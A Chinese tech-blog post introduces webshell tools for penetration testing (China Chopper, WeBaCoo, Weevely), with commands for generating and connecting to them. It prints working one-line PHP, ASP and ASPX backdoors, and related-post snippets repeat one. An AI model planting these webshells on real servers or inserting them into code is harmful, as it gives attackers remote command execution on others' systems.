kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)

最新推荐文章于 2024-03-26 22:18:17 发布
最新推荐文章于 2024-03-26 22:18:17 发布
阅读量2.0k 收藏 3
点赞数
分类专栏: 灰色是最美的颜色 文章标签: 中国菜刀 webacoo weevely webshell连接工具 渗透测试工具
辛苦原创,请勿盗取。
本文链接:https://blog.csdn.net/shuryuu/article/details/103186657
版权

本质 : 上传一句话木马

<?php echo shell_exec($_GET[‘cmd‘]);?>



windows平台
中国菜刀


支持asp、php、asp.net和jsp等 
可能被IDS、AV、WAF、扫描器软件发现查杀

使用方法:
往目标web服务器上传相应的一句话木马
asp一句话木马:

<%execute(request("pass"))%>

php一句话木马:

<?php @eval($_POST[pass]);?>

aspx一句话木马:

<%@ Page Language="Jscript"%>

<%eval(Request.Item["pass"])%>


打开中国菜刀,输入网址和密码(一句话木马中的参数) 连接服务端 

 

Linux平台
WeBaCoo(Web Backdoor Cookie)


获取的是类终端的shell 
通信内容base64编码后通过cookie头传输,隐蔽性较强 
缺点是不能指定密码

cookie中的参数
cm: base64编码的命令

cn: 服务器用于返回数据的cookie头的名

cp: 返回信息定界符

使用方法
1、生成服务器端

wenacoo -g -o a.php

2、上传后用客户端进行连接

webacoo -t -u http://1.1.1.1/a.php


Weevely(只支持PHP)


用http头进行指令传输
隐蔽的类终端PHP Webshell
有30多个管理模块

执行系统命令、浏览文件系统

检查服务器常见配置错误

创建正向、反向TCP Shell连接

通过目标计算机代理HTTP流量

从目标计算机运行端口扫描,渗透内网

支持连接密码

使用方法
1、生成服务端

weevely generate <password> b.php

生成的文件在 /usr/share/weevely/ 目录下

2、 连接客户端

weevely <URL> <password>

3、 输入help查看模块 

白夜鬼魅
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试详细入门实践课程-kali/sql注入
05-15
web渗透测试/渗透工具kali 渗透原理 渗透前期(网络踩点、网络扫描、网络查点) 渗透中期(利用漏洞信息进行渗透攻击、获取权限) 渗透后期(后渗透维持攻击、文件拷贝、代码植入、痕迹擦除) 渗透测试定义 渗透测试就是一种模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式。 本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。购买课程的同学可以获取价值200的教学资源包:包括虚拟机环境搭建的镜像、丰富的网络安全工具安装包和组网工具安装包等
自学渗透第四天--中国菜刀
weixin_43710367的博客
05-12 1181
自学渗透第四天–中国菜刀 一、如何使用 中国菜刀的使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。 (1)首先将一句话木马上传至网站后台。 (2)运行该文件,确认文件上传成功。 (3)复制该链接到中国菜刀,并输入相应的密码。 (4)成功获取网站shell。 二、常用功能 1、上传本地文件到网站后台。 2、下载在线文件至网站后台。 将欲下载的文件链接添加至下载框即可 由于某
网络安全实验十三 渗透测试项目
qq_64314976的博客
06-23 1400
步骤:在虚拟终端输入创建一个名叫hacker密码为111111的用户,但直接添加到管理组提升不了权限,远程桌面过去,输入账号hacker密码111111即可登录,登陆后发现没有administrators这个组,用whoami /all查看获取本地系统上所有用户(访问令牌)的用户名和组信息,注意到第一个的类型是别名(另外两个是已知),改名将hacker添加到管理组,成功执行,可以看到组成员多了一项。3、获得服务器上的关键敏感数据(C:\console)内。(网页关入侵--铜牌任务)(入侵提权--银牌任务)
入门必学!Kali Linux 安全渗透核心总结
最新发布
shandongjiushen的博客
03-26 888
Kali Linux渗透测试必看
渗透测试入门 —— 真的很简单
m0_59236127的博客
03-03 388
1.本题是渗透测试入门的一道基础题,虽然美其名曰“真的很简单”,但对于新手还是有一定挑战性的,实践并掌握本题中的所有知识点,对渗透测试的基本理解有很大帮助。此题的目标是对一个基于织梦 CMS 的网站进行渗透测试,找到网站登录后台,继而入侵服务器找到存放 flag 的文件。从实验手册上,可看出其中还会涉及到简单的提权过程。题目链接:解题链接:本次实验要求获取目标网站的FLAG信息。2.网站管理员的密码是多少?第 1 题相对简单,在实验环境内根据提示打开下载链接。
渗透测试实战--dedecms漏洞复现
qq_45070118的博客
08-18 4983
实验设备:一台windows服务器,一台kali,一台windows客户端 在虚拟机WIN7上使用phpstudy搭站(解压文件将文件放置在phpstudy配置文件WWW中),使用物理机进行攻击,WIN7 IP为192.168.10.5 物理机安装jdk,建立java环境,由此来运行菜刀 网页链接是WWW后的路径(http://ip/dedecms/uploads) 根据文件存放位置来定在物理机...
初始webshell+中国菜刀的使用
m0_48222671的博客
04-18 5145
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 文章目录一、webshell是什么?二、木马三、中国菜刀 一、webshell是什么? “Web” 的含义是服务器开放web服务; "Shell"的含义是取得对服务器某种程度上的操作权限; "webshell"就是获取对服务器的控制权限,这就需要我们借助一些webshell管理工具和一些漏洞去得到这种权限。 二、木马 在我们使用webshell管理工具之前,需要先在目标服务器上传或创建一个木马文件 木马分为大马、小马和一句话木马: 小马:文.
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
lza20001103的博客
08-13 4062
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
渗透利器 | 常见的WebShell管理工具
2201_75719295的博客
05-20 1012
攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,比如执行系统命令、读取配置文件、窃取用户数据,篡改网站页面等操作。 本文介绍十款常用的Webshell管理工具,以供你选择,你会选择哪一个?
常见渗透测试工具
weixin_51681067的博客
11-15 1116
(2)Metasploit:是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人员识别安全性问题, 验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。(3)Google hack:用Google搜索引擎对某些特定的网络主机漏洞(通常是服务器上的脚本漏 洞)进行搜索,以达到快速找到漏洞主机或特定主机的漏洞的目的。(4)Maltgo:是一款专业的数字取证软件,它提供了基于实体的网络和源,聚合了整个网络的信息。
渗透测试常用工具汇总_渗透测试实战
ZL_1618的博客
09-25 961
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。此外,它还具有功能齐全的仪表板、广泛的扫描功能和多格式报告功能。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
Kali-Linux-高级渗透测试-Robert-W.-Beggs.epub
07-15
高级渗透测试
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
无线渗透测试入门指南kali-linux-wireless-pentest-master.zip
01-30
无线渗透测试入门指南kali-linux-wireless-pentest-master.zip
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Python 实现毫秒级淘宝抢购脚本
热门推荐
网络安全领域优质创作者
12-31 7万+
本篇文章主要介绍了Python 通过selenium实现毫秒级自动抢购的示例代码,通过扫码登录即可自动完成一系列操作,抢购时间精确至毫秒,可抢加购物车等待时间结算的,也可以抢聚划算的商品。 博主不提供任何服务器端程序,也不提供任何收费抢购软件。该文章仅作为学习selenium框架的一个示例代码。该思路可运用到其他任何网站,京东,天猫,淘宝均可使用,且不属于外挂或者软件之类,只属于一个自动化点击工...
python抢购软件/插件/脚本附完整源码
网络安全领域优质创作者
12-31 1万+
距上篇关于淘宝抢购源码的文章已经过去五个月了,五个月来我通过不停的学习,掌握了更深层的抢购技术及原理,而上篇文章中我仅分享了关于加入购物车的商品的抢购源码,且有部分不足。 博主不提供任何服务器端程序,也不提供任何收费抢购软件。该文章仅作为学习selenium框架及GUI开发的一个示例代码。该思路可运用到其他任何网站,京东,天猫,淘宝均可使用,且不属于外挂或者软件之类,只属于一个自动化点击工具,如...
pycharm 断点失效 无法调试 无法debug解决方法
网络安全领域优质创作者
11-19 1万+
网上看了些答案,都说是开启了忽略断点的选项,也就是这个。 但是实际上并没有多少人会开启这东西的,所以问题是在哪呢?其实是因为这个地方,输入参数的时候导致的问题。 在代码界面,windows电脑右击,mac电脑两个指头点击一下就能看到。 红色方框内输入了东西导致的,具体原理我也不懂,反正就这样解决了,因为我之前输入参数之后,这个地方也会出现参数,然后就导致了无法断点,有知道原理的小伙伴可以私聊或者留言,我更新上去。 ...
kali渗透测试实战项目
08-26
Kali渗透测试实战项目是一种以Kali Linux为基础的实际渗透测试项目,旨在模拟真实的网络环境并测试其安全性。这种项目通常由安全团队或专业渗透测试人员执行,以识别潜在的漏洞和弱点,并提供解决方案来加强网络的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值